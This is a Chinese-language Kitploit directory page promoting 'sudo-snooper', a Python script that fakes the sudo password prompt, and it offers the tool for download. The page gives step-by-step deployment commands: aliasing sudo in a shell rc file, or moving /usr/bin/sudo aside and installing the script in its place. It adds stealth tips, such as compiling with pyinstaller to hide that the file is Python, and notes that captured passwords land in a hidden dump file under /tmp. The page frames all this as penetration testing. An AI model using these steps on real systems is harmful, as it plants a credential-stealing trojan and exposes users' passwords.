Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
sudo-snooper — 模拟原始 sudo 二进制文件以诱骗用户输入密码的 Python 脚本 | Kitploit
工具/GitHubGitHub/xorond/sudo-snooper
钓鱼工具密码攻击渗透测试社会工程学
GitHubxorond/sudo-snooper

sudo-snooper

模拟原始 sudo 二进制文件以诱骗用户输入密码的 Python 脚本

查看仓库
70346年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

sudo-snooper

sudo-snooper 的行为类似于原始的 sudo 二进制文件,旨在诱骗用户输入其密码。

它会向用户显示一个与原始 sudo 相似的虚假提示,要求输入 sudo 密码。

这在渗透测试或安全评估中可用于测试用户的安全意识。

安装步骤

选项 1 - 为 sudo 命令设置别名(较简单但稍显明显)

此选项更易于操作且可移植性更强,但细心的用户可能会察觉。

编辑用户所使用的 shell 的 rc 文件(可以是 .bashrc、.zshrc 等),并添加以下内容:

root@kitploit:~
alias sudo='python3 /path/to/sudo-snooper.py'

确保 sudo-snooper.py 具有正确的权限。

选项 2 - 替换真正的 sudo 进行安装(较复杂但更隐蔽)

此安装选项需要 root 权限

此方法仅在以下情况下有用:你已拥有 root 权限,但由于某种原因无法破解 /etc/shadow 中的哈希值。基本上,你可以通过钓鱼的方式获取用户的密码。

  • 将原始 sudo 二进制文件移动到其他名称下
root@kitploit:~
# mv /usr/bin/sudo /usr/bin/somename
  • 根据你的偏好修改文件中的参数

在 sudo-snooper.py 中更改以下内容:

root@kitploit:~
dumpdir = "/tmp/.snooper"
dumpfile = "/tmp/.snooper/dump.txt"
sudo = 'sudo'
  • 将 Python 文件安装到 /usr/bin/sudo(或之前 sudo 所在的目录)
root@kitploit:~
# install -dm755 sudo-snooper.py /usr/bin/sudo
  • 为 Python 文件授予必要的权限

    你可以在此处进行更高级的设置,例如将可执行文件设为用户不可读,但我不打算深入探讨。请参考此处的一些答案。

注意:一种更具说服力的安装方式是使用 pyinstaller 编译此脚本,这样当执行 file /usr/bin/sudo 时,它不会显示为 Python 文件。

在 Archlinux 下执行:pyinstaller --onefile sudo-snooper.py 即可完成。但请注意,一旦编译,你将无法更改编译后二进制文件中的参数。

使用方法:

安装完成后,sudo-snooper 可以像普通 sudo 一样被调用。

例如,运行

root@kitploit:~
sudo vim /etc/resolv.conf

将调用 sudo-snooper(假设已正确安装)。

它会要求用户输入密码,如果密码正确,则通过重定向到真正的 sudo 二进制文件来执行命令。

随后,你可以通过读取设置中指定的转储文件来获取用户密码。

TODO:

  • 处理用户输入错误密码的情况
下载工具